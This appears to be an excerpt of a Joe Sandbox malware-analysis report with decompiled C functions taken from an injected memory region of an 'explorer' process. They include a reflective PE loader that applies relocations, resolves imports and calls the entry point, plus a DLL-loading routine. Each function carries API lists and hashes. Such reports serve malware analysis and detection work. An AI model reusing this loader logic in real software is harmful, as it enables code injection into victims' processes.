                            				_t14 =  *(_t50 + 0x1898);
                            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                            					_t15 = E000895E1(_t50, 0xb62);
                            					_t66 =  *0x9e688; // 0xb0000
                            					_t62 = _t15;
                            					_t67 = _t66 + 0xb0;
                            					_v8 = _t62;
                            					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
                            					_t20 =  *0x9e688; // 0xb0000
                            					asm("sbb eax, eax");
                            					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                            					_t63 = "\\";
                            					_t26 =  *0x9e688; // 0xb0000
                            					_t68 = E000892E5(_t26 + 0x1020);
                            					_v12 = _t68;
                            					E000885D5( &_v8);
                            					_t32 =  *0x9e688; // 0xb0000
                            					_t34 = E000892E5(_t32 + 0x122a);
                            					 *0x9e784 = _t34;
                            					_t35 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                            					_t37 = LoadLibraryW( *0x9e784);
                            					 *0x9e77c = _t37;
                            					if(_t37 == 0) {
                            						_t38 = 0;
                            					} else {
                            						_push(_t37);
                            						_t60 = 0x28;
                            						_t38 = E0008E171(0x9bb48, _t60);
                            					}
                            					 *0x9e780 = _t38;
                            					E0008861A( &_v12, 0xfffffffe);
                            					memset( &_v140, 0, 0x80);
                            					if( *0x9e780 != 0) {
                            						goto L10;
                            					} else {
                            						E0008861A(0x9e784, 0xfffffffe);
                            						goto L8;
                            					}
                            				} else {
                            					L8:
                            					if( *0x9e780 == 0) {
                            						_t46 = E0009E6BC; // 0xc2fa18
                            						 *0x9e780 = _t46;
                            					}
                            					L10:
                            					return 1;
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                            • Opcode Fuzzy Hash: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E00092D70(int _a4, signed int _a8) {
                            				int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void* __esi;
                            				void* _t137;
                            				signed int _t141;
                            				intOrPtr* _t142;
                            				signed int _t145;
                            				signed int _t146;
                            				intOrPtr _t151;
                            				intOrPtr _t161;
                            				intOrPtr _t162;
                            				intOrPtr _t167;
                            				intOrPtr _t170;
                            				signed int _t172;
                            				intOrPtr _t173;
                            				int _t184;
                            				intOrPtr _t185;
                            				intOrPtr _t188;
                            				signed int _t189;
                            				void* _t195;
                            				int _t202;
                            				int _t208;
                            				intOrPtr _t217;
                            				signed int _t218;
                            				int _t219;
                            				intOrPtr _t220;
                            				signed int _t221;
                            				signed int _t222;
                            				int _t224;
                            				int _t225;
                            				signed int _t227;
                            				intOrPtr _t228;
                            				int _t232;
                            				int _t234;
                            				signed int _t235;
                            				int _t239;
                            				void* _t240;
                            				int _t245;
                            				int _t252;
                            				signed int _t253;
                            				int _t254;
                            				void* _t257;
                            				void* _t258;
                            				int _t259;
                            				intOrPtr _t260;
                            				int _t261;
                            				signed int _t269;
                            				signed int _t271;
                            				intOrPtr* _t272;
                            				void* _t273;
                            
                            				_t253 = _a8;
                            				_t272 = _a4;
                            				_t3 = _t272 + 0xc; // 0x452bf84d
                            				_t4 = _t272 + 0x2c; // 0x8df075ff
                            				_t228 =  *_t4;
                            				_t137 =  *_t3 + 0xfffffffb;
                            				_t229 =  <=  ? _t137 : _t228;
                            				_v16 =  <=  ? _t137 : _t228;
                            				_t269 = 0;
                            				_a4 =  *((intOrPtr*)( *_t272 + 4));
                            				asm("o16 nop [eax+eax]");
                            				while(1) {
                            					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                            					_t141 =  *_t8 + 0x2a >> 3;
                            					_v12 = 0xffff;
                            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                            					if(_t217 < _t141) {
                            						break;
                            					}
                            					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t12 = _t272 + 0x5c; // 0x84e85000
                            					_t245 =  *_t11 -  *_t12;
                            					_v8 = _t245;
                            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                            					_t247 =  <  ? _t195 : _v12;
                            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                            					if(_t227 >= _v16) {
                            						L7:
                            						if(_t253 != 4) {
                            							L10:
                            							_t269 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t285 = _t227 - _t195;
                            							if(_t227 != _t195) {
                            								goto L10;
                            							} else {
                            								_t269 = _t253 - 3;
                            							}
                            						}
                            						E00095D90(_t272, _t272, 0, 0, _t269);
                            						_t18 = _t272 + 0x14; // 0xc703f045
                            						_t19 = _t272 + 8; // 0x8d000040
                            						 *( *_t18 +  *_t19 - 4) = _t227;
                            						_t22 = _t272 + 0x14; // 0xc703f045
                            						_t23 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                            						_t26 = _t272 + 0x14; // 0xc703f045
                            						_t27 = _t272 + 8; // 0x8d000040
                            						 *( *_t26 +  *_t27 - 2) =  !_t227;
                            						_t30 = _t272 + 0x14; // 0xc703f045
                            						_t31 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                            						E00094AF0(_t285,  *_t272);
                            						_t202 = _v8;
                            						_t273 = _t273 + 0x14;
                            						if(_t202 != 0) {
                            							_t208 =  >  ? _t227 : _t202;
                            							_v8 = _t208;
                            							_t36 = _t272 + 0x38; // 0xf47d8bff
                            							_t37 = _t272 + 0x5c; // 0x84e85000
                            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                            							_t273 = _t273 + 0xc;
                            							_t252 = _v8;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                            							_t227 = _t227 - _t252;
                            						}
                            						if(_t227 != 0) {
                            							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
                            							_t273 = _t273 + 0xc;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                            						}
                            						_t253 = _a8;
                            						if(_t269 == 0) {
                            							continue;
                            						}
                            					} else {
                            						if(_t227 != 0 || _t253 == 4) {
                            							if(_t253 != 0 && _t227 == _t195) {
                            								goto L7;
                            							}
                            						}
                            					}
                            					break;
                            				}
                            				_t142 =  *_t272;
                            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                            				_a4 = _t232;
                            				if(_t232 == 0) {
                            					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t254 =  *_t83;
                            				} else {
                            					_t59 = _t272 + 0x2c; // 0x8df075ff
                            					_t224 =  *_t59;
                            					if(_t232 < _t224) {
                            						_t65 = _t272 + 0x3c; // 0x830cc483
                            						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t260 =  *_t66;
                            						__eflags =  *_t65 - _t260 - _t232;
                            						if( *_t65 - _t260 <= _t232) {
                            							_t67 = _t272 + 0x38; // 0xf47d8bff
                            							_t261 = _t260 - _t224;
                            							 *(_t272 + 0x6c) = _t261;
                            							memcpy( *_t67,  *_t67 + _t224, _t261);
                            							_t70 = _t272 + 0x16b0; // 0xdf750008
                            							_t188 =  *_t70;
                            							_t273 = _t273 + 0xc;
                            							_t232 = _a4;
                            							__eflags = _t188 - 2;
                            							if(_t188 < 2) {
                            								_t189 = _t188 + 1;
                            								__eflags = _t189;
                            								 *(_t272 + 0x16b0) = _t189;
                            							}
                            						}
                            						_t73 = _t272 + 0x38; // 0xf47d8bff
                            						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                            						_t225 = _a4;
                            						_t273 = _t273 + 0xc;
                            						_t76 = _t272 + 0x6c;
                            						 *_t76 =  *(_t272 + 0x6c) + _t225;
                            						__eflags =  *_t76;
                            						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t184 =  *_t78;
                            						_t79 = _t272 + 0x2c; // 0x8df075ff
                            						_t239 =  *_t79;
                            					} else {
                            						 *(_t272 + 0x16b0) = 2;
                            						_t61 = _t272 + 0x38; // 0xf47d8bff
                            						memcpy( *_t61,  *_t142 - _t224, _t224);
                            						_t62 = _t272 + 0x2c; // 0x8df075ff
                            						_t184 =  *_t62;
                            						_t273 = _t273 + 0xc;
                            						_t225 = _a4;
                            						_t239 = _t184;
                            						 *(_t272 + 0x6c) = _t184;
                            					}
                            					_t254 = _t184;
                            					 *(_t272 + 0x5c) = _t184;
                            					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                            					_t185 =  *_t81;
                            					_t240 = _t239 - _t185;
                            					_t241 =  <=  ? _t225 : _t240;
                            					_t242 = ( <=  ? _t225 : _t240) + _t185;
                            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                            				}
                            				if( *(_t272 + 0x16c0) < _t254) {
                            					 *(_t272 + 0x16c0) = _t254;
                            				}
                            				if(_t269 == 0) {
                            					_t218 = _a8;
                            					__eflags = _t218;
                            					if(_t218 == 0) {
                            						L34:
                            						_t89 = _t272 + 0x3c; // 0x830cc483
                            						_t219 =  *_t272;
                            						_t145 =  *_t89 - _t254 - 1;
                            						_a4 =  *_t272;
                            						_t234 = _t254;
                            						_v16 = _t145;
                            						_v8 = _t254;
                            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                            							_v8 = _t254;
                            							_t95 = _t272 + 0x5c; // 0x84e85000
                            							_a4 = _t219;
                            							_t234 = _t254;
                            							_t97 = _t272 + 0x2c; // 0x8df075ff
                            							__eflags =  *_t95 -  *_t97;
                            							if( *_t95 >=  *_t97) {
                            								_t98 = _t272 + 0x2c; // 0x8df075ff
                            								_t167 =  *_t98;
                            								_t259 = _t254 - _t167;
                            								_t99 = _t272 + 0x38; // 0xf47d8bff
                            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                            								 *(_t272 + 0x6c) = _t259;
                            								memcpy( *_t99, _t167 +  *_t99, _t259);
                            								_t103 = _t272 + 0x16b0; // 0xdf750008
                            								_t170 =  *_t103;
                            								_t273 = _t273 + 0xc;
                            								__eflags = _t170 - 2;
                            								if(_t170 < 2) {
                            									_t172 = _t170 + 1;
                            									__eflags = _t172;
                            									 *(_t272 + 0x16b0) = _t172;
                            								}
                            								_t106 = _t272 + 0x2c; // 0x8df075ff
                            								_t145 = _v16 +  *_t106;
                            								__eflags = _t145;
                            								_a4 =  *_t272;
                            								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                            								_t234 =  *_t108;
                            								_v8 = _t234;
                            							}
                            						}
                            						_t255 = _a4;
                            						_t220 =  *((intOrPtr*)(_a4 + 4));
                            						__eflags = _t145 - _t220;
                            						_t221 =  <=  ? _t145 : _t220;
                            						_t146 = _t221;
                            						_a4 = _t221;
                            						_t222 = _a8;
                            						__eflags = _t146;
                            						if(_t146 != 0) {
                            							_t114 = _t272 + 0x38; // 0xf47d8bff
                            							E00094C30(_t255,  *_t114 + _v8, _t146);
                            							_t273 = _t273 + 0xc;
                            							_t117 = _t272 + 0x6c;
                            							 *_t117 =  *(_t272 + 0x6c) + _a4;
                            							__eflags =  *_t117;
                            							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                            							_t234 =  *_t119;
                            						}
                            						__eflags =  *(_t272 + 0x16c0) - _t234;
                            						if( *(_t272 + 0x16c0) < _t234) {
                            							 *(_t272 + 0x16c0) = _t234;
                            						}
                            						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                            						_t123 = _t272 + 0xc; // 0x452bf84d
                            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                            						__eflags = _t257 - 0xffff;
                            						_t258 =  >  ? 0xffff : _t257;
                            						_t124 = _t272 + 0x2c; // 0x8df075ff
                            						_t151 =  *_t124;
                            						_t125 = _t272 + 0x5c; // 0x84e85000
                            						_t235 = _t234 -  *_t125;
                            						__eflags = _t258 - _t151;
                            						_t152 =  <=  ? _t258 : _t151;
                            						__eflags = _t235 - ( <=  ? _t258 : _t151);
                            						if(_t235 >= ( <=  ? _t258 : _t151)) {
                            							L49:
                            							__eflags = _t235 - _t258;
                            							_t154 =  >  ? _t258 : _t235;
                            							_a4 =  >  ? _t258 : _t235;
                            							__eflags = _t222 - 4;
                            							if(_t222 != 4) {
                            								L53:
                            								_t269 = 0;
                            								__eflags = 0;
                            							} else {
                            								_t161 =  *_t272;
                            								__eflags =  *(_t161 + 4);
                            								_t154 = _a4;
                            								if( *(_t161 + 4) != 0) {
                            									goto L53;
                            								} else {
                            									__eflags = _t154 - _t235;
                            									if(_t154 != _t235) {
                            										goto L53;
                            									} else {
                            										_t269 = _t222 - 3;
                            									}
                            								}
                            							}
                            							_t131 = _t272 + 0x38; // 0xf47d8bff
                            							_t132 = _t272 + 0x5c; // 0x84e85000
                            							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                            							_t134 = _t272 + 0x5c;
                            							 *_t134 =  *(_t272 + 0x5c) + _a4;
                            							__eflags =  *_t134;
                            							E00094AF0( *_t134,  *_t272);
                            						} else {
                            							__eflags = _t235;
                            							if(_t235 != 0) {
                            								L46:
                            								__eflags = _t222;
                            								if(_t222 != 0) {
                            									_t162 =  *_t272;
                            									__eflags =  *(_t162 + 4);
                            									if( *(_t162 + 4) == 0) {
                            										__eflags = _t235 - _t258;
                            										if(_t235 <= _t258) {
                            											goto L49;
                            										}
                            									}
                            								}
                            							} else {
                            								__eflags = _t222 - 4;
                            								if(_t222 == 4) {
                            									goto L46;
                            								}
                            							}
                            						}
                            						asm("sbb edi, edi");
                            						_t271 =  ~_t269 & 0x00000002;
                            						__eflags = _t271;
                            						return _t271;
                            					} else {
                            						__eflags = _t218 - 4;
                            						if(_t218 == 4) {
                            							goto L34;
                            						} else {
                            							_t173 =  *_t272;
                            							__eflags =  *(_t173 + 4);
                            							if( *(_t173 + 4) != 0) {
                            								goto L34;
                            							} else {
                            								_t88 = _t272 + 0x5c; // 0x84e85000
                            								__eflags = _t254 -  *_t88;
                            								if(_t254 !=  *_t88) {
                            									goto L34;
                            								} else {
                            									return 1;
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					return 3;
                            				}
                            			}
                            0x00092e9a
                            0x00092e9a
                            0x00092e9e
                            0x00092ea7
                            0x00092eae
                            0x00092eb1
                            0x00092eb6
                            0x00092ebb
                            0x00092ebb
                            0x00092ebe
                            0x00092ec3
                            0x00000000
                            0x00000000
                            0x00092de7
                            0x00092de9
                            0x00092df6
                            0x00000000
                            0x00000000
                            0x00092df6
                            0x00092de9
                            0x00000000
                            0x00092de5
                            0x00092ec9
                            0x00092ece
                            0x00092ed1
                            0x00092ed4
                            0x00092f7f
                            0x00092f7f
                            0x00092eda
                            0x00092eda
                            0x00092eda
                            0x00092edf
                            0x00092f09
                            0x00092f0c
                            0x00092f0c
                            0x00092f11
                            0x00092f13
                            0x00092f15
                            0x00092f18
                            0x00092f1b
                            0x00092f23
                            0x00092f28
                            0x00092f28
                            0x00092f2e
                            0x00092f31
                            0x00092f34
                            0x00092f37
                            0x00092f39
                            0x00092f39
                            0x00092f3a
                            0x00092f3a
                            0x00092f37
                            0x00092f48
                            0x00092f4b
                            0x00092f4f
                            0x00092f54
                            0x00092f57
                            0x00092f5a
                            0x00092f5a
                            0x00092f5a
                            0x00092f5d
                            0x00092f5d
                            0x00092f60
                            0x00092f60
                            0x00092ee1
                            0x00092ee1
                            0x00092ef1
                            0x00092ef4
                            0x00092ef9
                            0x00092ef9
                            0x00092efc
                            0x00092eff
                            0x00092f02
                            0x00092f04
                            0x00092f04
                            0x00092f63
                            0x00092f65
                            0x00092f68
                            0x00092f68
                            0x00092f6e
                            0x00092f72
                            0x00092f75
                            0x00092f77
                            0x00092f77
                            0x00092f88
                            0x00092f8a
                            0x00092f8a
                            0x00092f92
                            0x00092fa0
                            0x00092fa3
                            0x00092fa5
                            0x00092fc5
                            0x00092fc5
                            0x00092fc8
                            0x00092fce
                            0x00092fcf
                            0x00092fd2
                            0x00092fd4
                            0x00092fd7
                            0x00092fda
                            0x00092fdd
                            0x00092fe1
                            0x00092fe4
                            0x00092fe7
                            0x00092fea
                            0x00092fec
                            0x00092fec
                            0x00092fef
                            0x00092ff1
                            0x00092ff1
                            0x00092ff4
                            0x00092ff6
                            0x00092ff9
                            0x00093001
                            0x00093004
                            0x00093009
                            0x00093009
                            0x0009300f
                            0x00093012
                            0x00093015
                            0x00093017
                            0x00093017
                            0x00093018
                            0x00093018
                            0x00093023
                            0x00093023
                            0x00093023
                            0x00093026
                            0x00093029
                            0x00093029
                            0x0009302c
                            0x0009302c
                            0x00092fef
                            0x0009302f
                            0x00093032
                            0x00093035
                            0x00093037
                            0x0009303a
                            0x0009303c
                            0x0009303f
                            0x00093042
                            0x00093044
                            0x00093047
                            0x0009304f
                            0x00093057
                            0x0009305a
                            0x0009305a
                            0x0009305a
                            0x0009305d
                            0x0009305d
                            0x0009305d
                            0x00093060
                            0x00093066
                            0x00093068
                            0x00093068
                            0x0009306e
                            0x00093074
                            0x0009307d
                            0x00093084
                            0x00093086
                            0x00093089
                            0x00093089
                            0x0009308c
                            0x0009308c
                            0x0009308f
                            0x00093091
                            0x00093094
                            0x00093096
                            0x000930b1
                            0x000930b1
                            0x000930b5
                            0x000930b8
                            0x000930bb
                            0x000930be
                            0x000930d4
                            0x000930d4
                            0x000930d4
                            0x000930c0
                            0x000930c0
                            0x000930c2
                            0x000930c6
                            0x000930c9
                            0x00000000
                            0x000930cb
                            0x000930cb
                            0x000930cd
                            0x00000000
                            0x000930cf
                            0x000930cf
                            0x000930cf
                            0x000930cd
                            0x000930c9
                            0x000930d8
                            0x000930db
                            0x000930e0
                            0x000930ea
                            0x000930ea
                            0x000930ea
                            0x000930ed
                            0x00093098
                            0x00093098
                            0x0009309a
                            0x000930a1
                            0x000930a1
                            0x000930a3
                            0x000930a5
                            0x000930a7
                            0x000930ab
                            0x000930ad
                            0x000930af
                            0x00000000
                            0x00000000
                            0x000930af
                            0x000930ab
                            0x0009309c
                            0x0009309c
                            0x0009309f
                            0x00000000
                            0x00000000
                            0x0009309f
                            0x0009309a
                            0x000930f7
                            0x000930f9
                            0x000930f9
                            0x00093104
                            0x00092fa7
                            0x00092fa7
                            0x00092faa
                            0x00000000
                            0x00092fac
                            0x00092fac
                            0x00092fae
                            0x00092fb2
                            0x00000000
                            0x00092fb4
                            0x00092fb4
                            0x00092fb4
                            0x00092fb7
                            0x00000000
                            0x00092fbb
                            0x00092fc4
                            0x00092fc4
                            0x00092fb7
                            0x00092fb2
                            0x00092faa
                            0x00092f96
                            0x00092f9f
                            0x00092f9f

                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 52%
                            			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				signed int _v5;
                            				signed short _v12;
                            				intOrPtr* _v16;
                            				signed int* _v20;
                            				intOrPtr _v24;
                            				unsigned int _v28;
                            				signed short* _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr* _v40;
                            				signed short* _v44;
                            				intOrPtr _v48;
                            				unsigned int _v52;
                            				intOrPtr _v56;
                            				_Unknown_base(*)()* _v60;
                            				signed int _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				unsigned int _v76;
                            				intOrPtr _v80;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				signed int _t149;
                            				void* _t189;
                            				signed int _t194;
                            				signed int _t196;
                            				intOrPtr _t236;
                            
                            				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            				_v24 = _v72;
                            				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                            				_v56 = _t236;
                            				if(_t236 == 0) {
                            					L13:
                            					while(0 != 0) {
                            					}
                            					_push(8);
                            					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                            						L35:
                            						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                            						while(0 != 0) {
                            						}
                            						if(_a12 != 0) {
                            							 *_a12 = _v68;
                            						}
                            						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                            						return _v68(_a4, 1, _a8);
                            					}
                            					_v84 = 0x80000000;
                            					_t149 = 8;
                            					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						if(_v36 == 0) {
                            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                            						}
                            						if(_v36 != 0) {
                            							if( *_v16 == 0) {
                            								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                            							} else {
                            								_v20 =  *_v16 + _a4;
                            							}
                            							_v64 = _v64 & 0x00000000;
                            							while( *_v20 != 0) {
                            								if(( *_v20 & _v84) == 0) {
                            									_v88 =  *_v20 + _a4;
                            									_v60 = GetProcAddress(_v36, _v88 + 2);
                            								} else {
                            									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                            								}
                            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                            									 *_v20 = _v60;
                            								} else {
                            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                            								}
                            								_v20 =  &(_v20[1]);
                            								_v64 = _v64 + 4;
                            							}
                            							_v16 = _v16 + 0x14;
                            							continue;
                            						} else {
                            							_t189 = 0xfffffffd;
                            							return _t189;
                            						}
                            					}
                            					goto L35;
                            				}
                            				_t194 = 8;
                            				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                            				_t196 = 8;
                            				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                            				while(0 != 0) {
                            				}
                            				while(_v48 > 0) {
                            					_v28 = _v44[2];
                            					_v48 = _v48 - _v28;
                            					_v28 = _v28 - 8;
                            					_v28 = _v28 >> 1;
                            					_v32 =  &(_v44[4]);
                            					_v80 = _a4 +  *_v44;
                            					_v52 = _v28;
                            					while(1) {
                            						_v76 = _v52;
                            						_v52 = _v52 - 1;
                            						if(_v76 == 0) {
                            							break;
                            						}
                            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                            						_v12 =  *_v32 & 0xfff;
                            						_v40 = (_v12 & 0x0000ffff) + _v80;
                            						if((_v5 & 0x000000ff) != 3) {
                            							if((_v5 & 0x000000ff) == 0xa) {
                            								 *_v40 =  *_v40 + _v56;
                            							}
                            						} else {
                            							 *_v40 =  *_v40 + _v56;
                            						}
                            						_v32 =  &(_v32[1]);
                            					}
                            					_v44 = _v32;
                            				}
                            				goto L13;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                            • LoadLibraryA.KERNEL32(?), ref: 00092C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                            • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
                            				char _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v28;
                            				void* _t13;
                            				intOrPtr _t15;
                            				signed int _t16;
                            				intOrPtr _t17;
                            				signed int _t18;
                            				char _t20;
                            				intOrPtr _t22;
                            				void* _t23;
                            				void* _t24;
                            				intOrPtr _t29;
                            				intOrPtr _t35;
                            				intOrPtr _t41;
                            				intOrPtr _t43;
                            				intOrPtr _t48;
                            				void* _t51;
                            				signed int _t61;
                            				signed int _t64;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t61 = __ecx;
                            				_t41 =  *0x9e6dc; // 0x1e8
                            				_t13 = E0008A4BF(_t41, 0);
                            				while(_t13 < 0) {
                            					E0008980C( &_v28);
                            					_t43 =  *0x9e6e0; // 0x0
                            					_t15 =  *0x9e6e4; // 0x0
                            					_t41 = _t43 + 0xe10;
                            					asm("adc eax, ebx");
                            					__eflags = _t15 - _v24;
                            					if(__eflags > 0) {
                            						L9:
                            						_t16 = 0xfffffffe;
                            						L13:
                            						return _t16;
                            					}
                            					if(__eflags < 0) {
                            						L4:
                            						_t17 =  *0x9e684; // 0xc2f8f0
                            						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
                            						__eflags = _t18;
                            						if(_t18 == 0) {
                            							break;
                            						}
                            						_t35 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                            						_t41 =  *0x9e6dc; // 0x1e8
                            						__eflags = 0;
                            						_t13 = E0008A4BF(_t41, 0);
                            						continue;
                            					}
                            					__eflags = _t41 - _v28;
                            					if(_t41 >= _v28) {
                            						goto L9;
                            					}
                            					goto L4;
                            				}
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t20 =  *0x9e6e8; // 0xc2fd78
                            				_v28 = _t20;
                            				_t22 = E0008A6A9(_t41, _t61,  &_v16);
                            				_v20 = _t22;
                            				if(_t22 != 0) {
                            					_t23 = GetCurrentProcess();
                            					_t24 = GetCurrentThread();
                            					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
                            					E0008980C(0x9e6e0);
                            					_t64 = E00081A1B( &_v28, E00081226, _t71);
                            					__eflags = _t64;
                            					if(_t64 >= 0) {
                            						_push(0);
                            						_push( *0x9e760);
                            						_t51 = 0x27;
                            						E00089F06(_t51);
                            					}
                            				} else {
                            					_t64 = _t61 | 0xffffffff;
                            				}
                            				_t29 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
                            				_t48 =  *0x9e6dc; // 0x1e8
                            				 *0x9e6d0 = 0;
                            				E0008A4DB(_t48);
                            				E0008861A( &_v24, 0);
                            				_t16 = _t64;
                            				goto L13;
                            			}

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
